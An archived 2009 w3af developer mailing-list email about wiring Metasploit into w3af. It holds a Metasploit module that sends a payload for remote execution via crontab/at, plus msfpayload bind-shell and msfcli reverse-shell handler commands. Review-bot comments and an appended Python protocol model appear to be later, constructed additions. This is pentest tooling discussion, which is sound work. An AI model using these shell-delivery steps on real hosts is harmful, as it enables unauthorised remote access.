Adam,

On Tue, Jun 30, 2009 at 4:34 PM, Adam
Baldwin<adam_bald...@ngenuity-is.com> wrote:
> Andres et al,
>
> Please take a peek, I updated the code so that it now loads and conforms
> closer with Metasploit 3.2 framework specs. I'm sure there are other
> things that need updating, but at least now the framework loads the
> module and communicates with the virtual daemon.

You're the man! Thanks! I just committed this to the trunk.

Something I've been thinking about a lot is to change the way
metasploit interacts with w3af. I think that instead of making the
user run the metasploit user interface, select the plugin, etc., we
should use one of the metasploit features, msfpayload.

Right now, metasploit sends the payload to the vdaemon, which then
creates the EXE or PE file, and then sends it to the remote server.
What I would like to do is use MSF to create the file and remove
the EXE/PE file creation from w3af. To do that, we need to run
msfpayload to create the EXE/PE:

./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Once the executable is created, we need to send it to the remote host
(using any of the already available methods), and execute it. Before
executing it, we need to run something like this on the w3af box:

./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp
LHOST=192.168.1.112 E

I think that this is the way of doing it; it's much better, because we
can wrap around MSF, and we are simplifying a lot of steps for novice
users. More information about this way of working with MSF can be
found here:

http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html

Do you have time to work with this?

> Regards,
> -Adam
>
>
>
> 26d25
> < module Msf
> 28c27
> < class Exploits::Unix::Misc::W3af_vdaemon < Msf::Exploit::Remote
> ---
>> class Metasploit3 < Msf::Exploit::Remote
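Review bot: renaming the class from `Exploits::Unix::Misc::W3af_vdaemon` to the generic `Metasploit3` moves the module's identity out of the class name and onto the file's location in the modules tree, so the commit should say which directory w3af_vdaemon.rb is meant to live in; the `Unix::Misc` path of the old name no longer fits a module whose declared targets are Windows and Linux and whose peer is the local vdaemon.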
> 30c29
> <       include Exploit::Remote::Tcp
> ---
>>       include Msf::Exploit::Remote::Tcp
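Review bot: keep the fully qualified `Msf::Exploit::Remote::Tcp` here; once 26d25 removes the enclosing `module Msf`, a bare `Exploit::Remote::Tcp` would no longer resolve from a top-level class, so this hunk has to land together with 26d25 and its matching `end` removal in 139d137.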
> 139d137
> < end
>
> '''
> w3af_vdaemon.rb
>
> Copyright 2006 Andres Riancho
>
> This file is part of w3af, w3af.sourceforge.net .
>
> w3af is free software; you can redistribute it and/or modify
> it under the terms of the GNU General Public License as published by
> the Free Software Foundation version 2 of the License.
>
> w3af is distributed in the hope that it will be useful,
> but WITHOUT ANY WARRANTY; without even the implied warranty of
> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
> GNU General Public License for more details.
>
> You should have received a copy of the GNU General Public License
> along with w3af; if not, write to the Free Software
> Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
>
> '''
>
>
> require 'msf/core'
>
>
> class Metasploit3 < Msf::Exploit::Remote
>
>        include Msf::Exploit::Remote::Tcp
>
>        def initialize(info = {})
>                super(update_info(info,
>                        'Name'           => 'w3af virtual daemon exploit',
>                        'Description'    => %q{
>                                This module is used to link metasploit and w3af together.
>                        },
>                        'Author'         => 'Andres Riancho',
>                        'License'        => MSF_LICENSE,
>                        'Version'        => '$Revision: 1 $',
>                        'References'     =>
>                                [
>                                        ['URL', 'http://w3af.sourceforge.net/']
>                                ],
>                        'DefaultOptions' =>
>                                {
>                                        'EXITFUNC' => 'payload',
>                                },
>
>                        'Payload' =>
>                                        {
>                                                        'Space'       => 8000,
>                                                        'DisableNops' => true,
>                                        },
>
>                        'Targets'        =>
>                                [
>                                        ['Windows',     { 'Platform' => 'win' } ],
>                                        ['Linux',     { 'Platform' => 'linux' } ]
>                                ],
>
>                        'Privileged'     => true,
>
>                        'DefaultTarget' => 0))
>
>                        register_options(
>                                [
>                                        Opt::RHOST('172.16.1.128')
>                                ], self.class)
>
>                        deregister_options('RPORT')
>
>        end
>
>        def recvWaitTime( theSocket )
>                data = theSocket.get_once( 2 , 5 )
>                return data.to_i
>        end
>
>        def waitForData( waitTime, theSocket )
>                sleep( waitTime )
>
>                # This loop is to receive the "<go>" sent by w3af
>                data = theSocket.get_once( 4 , 2 )
>                #print_status("Received outside the loop: #{data}")
>
>                while data == nil
>                        print_status("Waiting...")
>                        data = theSocket.get_once( 4 , 2 )
>                        #print_status("Received in loop: #{data}")
>                end
>
>                theSocket.put('<doneWaiting>')
>
>                return data
>        end
>
>        def exploit
>                # Connect to the vdaemon and send the payload
>                vdaemonSock = connect(false, { 'RPORT' => 9091 , 'RHOST' => '127.0.0.1' })
>                # Say hi!
>                vdaemonSock.put('<metasploit-w3af-link>')
>
>                remoteIP = vdaemonSock.get_once
>                print_status("The remote IP address is: #{remoteIP}")
>                print_status("Using remote IP address to create payloads.")
>
>                vdaemonSock.put(payload.encoded.length.to_s.rjust(4))
>                vdaemonSock.put(payload.encoded)
>                print_status("Sent payload to vdaemon.")
>
>                response = recvWaitTime( vdaemonSock )
>                print_status("The estimated time to wait for the extrusion scan to complete is: #{response} seconds.")
>                waitForData( response, vdaemonSock )
>                print_status("Done waiting!")
>
>                response = recvWaitTime( vdaemonSock )
>                print_status("The estimated time to wait for PE/ELF transfer is: #{response} seconds.")
>                waitForData( response, vdaemonSock )
>                print_status("Done waiting!")
>
>                # Get how much time to wait
>                response = recvWaitTime( vdaemonSock )
>
>                # wait for the crontab/at to run
>                print_status("Going to wait for #{response} seconds (waiting for crontab/at to execute payload).")
>                print_status("The session could start before the handler, so please *be patient*.")
>                #waitForData( response.to_i, vdaemonSock )
>                sleep( response.to_i )
>                print_status("Done waiting!")
>
>                print_status("Starting handler")
>                handler
>
>                disconnect
>        end
>
> end
>



-- 
Andrés Riancho
Founder, Bonsai - Information Security
http://www.bonsai-sec.com/
http://w3af.sf.net/

------------------------------------------------------------------------------
_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop
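The module quoted above drives a small fixed-format protocol against the vdaemon on 127.0.0.1:9091, but the daemon side is not on this page. The following Python model is added here and is not part of w3af or of the quoted module: it plays both halves over loopback, a mock daemon (`vdaemon_serve`, whose behaviour is inferred from what the Ruby `exploit` method sends and expects) and a client (`msf_client`) that mirrors that method step for step. It also makes explicit two things the module leaves implicit: the greeting `<metasploit-w3af-link>` is the only check the daemon performs, which is why both ends stay on loopback, and the 4-character right-justified length field caps a payload at 9999 bytes (the module's 'Space' of 8000 stays under that). The function names, the remote IP `10.0.0.5`, the wait times and the placeholder payload bytes are all constructed for the example.

```python
"""Worked model of the vdaemon <-> Metasploit link protocol (constructed example)."""
import socket
import threading
import time

# Framing constants read off the quoted w3af_vdaemon.rb module.
HELLO = b'<metasploit-w3af-link>'   # client greeting; the only check the daemon makes
GO = b'<go>'                        # daemon -> client: a phase has finished
DONE_WAITING = b'<doneWaiting>'     # client -> daemon: acknowledgement
LEN_FIELD = 4                       # payload length, decimal, rjust(4)
WAIT_FIELD = 2                      # wait times, decimal, read with get_once(2, 5)
MAX_PAYLOAD = 10 ** LEN_FIELD - 1   # largest length a 4-char field can carry


def recv_exact(sock, n):
    """Read exactly n bytes; the Ruby get_once() reads *up to* n, which can split a field."""
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('peer closed before %d bytes arrived' % n)
        buf += chunk
    return buf


def vdaemon_serve(listener, remote_ip, wait_times, record):
    """Mock daemon half (assumed behaviour of w3af's vdaemon, not its code)."""
    record['acks'] = []
    conn, _ = listener.accept()
    with conn:
        # One read of up to len(HELLO) bytes, like get_once; anything else is dropped.
        if conn.recv(len(HELLO)) != HELLO:
            record['rejected'] = True
            return
        conn.sendall(remote_ip.encode())                     # tell the client the target IP
        length = int(recv_exact(conn, LEN_FIELD).decode())   # int() tolerates the padding
        record['payload'] = recv_exact(conn, length)
        # Two "announce the wait, then <go>" phases: extrusion scan and PE/ELF transfer.
        for secs in wait_times[:2]:
            conn.sendall(str(secs).rjust(WAIT_FIELD).encode())
            conn.sendall(GO)
            record['acks'].append(recv_exact(conn, len(DONE_WAITING)))
        # Final delay for the crontab/at job; the client only sleeps, no <go> follows.
        conn.sendall(str(wait_times[2]).rjust(WAIT_FIELD).encode())


def msf_client(host, port, payload, hello=HELLO, sleeper=time.sleep):
    """Client half mirroring the module's exploit method, step for step."""
    if len(payload) > MAX_PAYLOAD:
        raise ValueError('payload exceeds the %d-byte limit of the length field' % MAX_PAYLOAD)
    log = []
    with socket.create_connection((host, port)) as sock:
        sock.sendall(hello)
        remote_ip = sock.recv(64).decode()        # daemon answers with the remote IP
        if not remote_ip:
            raise ConnectionError('vdaemon refused the handshake')
        log.append(('remote_ip', remote_ip))
        sock.sendall(str(len(payload)).rjust(LEN_FIELD).encode() + payload)
        for phase in ('extrusion scan', 'PE/ELF transfer'):
            secs = int(recv_exact(sock, WAIT_FIELD).decode())
            sleeper(secs)
            if recv_exact(sock, len(GO)) != GO:
                raise ConnectionError('expected <go> after %s' % phase)
            sock.sendall(DONE_WAITING)
            log.append((phase, secs))
        final = int(recv_exact(sock, WAIT_FIELD).decode())
        sleeper(final)
        log.append(('crontab/at', final))
    return log


def run_exchange(payload, remote_ip='10.0.0.5', wait_times=(3, 2, 5),
                 hello=HELLO, sleeper=time.sleep):
    """Run both halves over loopback (as the module's hard-coded 127.0.0.1 does)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(('127.0.0.1', 0))
    listener.listen(1)
    record = {}
    worker = threading.Thread(target=vdaemon_serve,
                              args=(listener, remote_ip, wait_times, record))
    worker.start()
    result = {'daemon': record}
    try:
        result['client'] = msf_client('127.0.0.1', listener.getsockname()[1],
                                      payload, hello, sleeper)
    except (ConnectionError, ValueError) as exc:
        result['error'] = str(exc)
        if worker.is_alive():   # client never connected; unblock the daemon's accept()
            socket.create_connection(listener.getsockname()).close()
    finally:
        worker.join()
        listener.close()
    return result


if __name__ == '__main__':
    # Constructed placeholder bytes stand in for payload.encoded; no-op sleeper for the demo.
    for step in run_exchange(b'PLACEHOLDER-PAYLOAD-BYTES', sleeper=lambda s: None)['client']:
        print(step)
```

Run directly, it prints the client's view of the exchange; pass the default `time.sleep` as `sleeper` to see the three pauses the module's print_status messages describe. The client uses exact reads where the Ruby get_once() reads up to n bytes, so a wait-time or `<go>` field that straddled two segments would be reassembled here rather than misparsed.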
